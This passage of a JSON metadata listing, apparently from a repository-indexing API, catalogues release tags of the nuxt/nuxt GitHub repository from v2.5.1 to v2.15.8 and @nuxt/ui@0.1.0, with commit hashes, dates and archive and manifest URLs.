_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.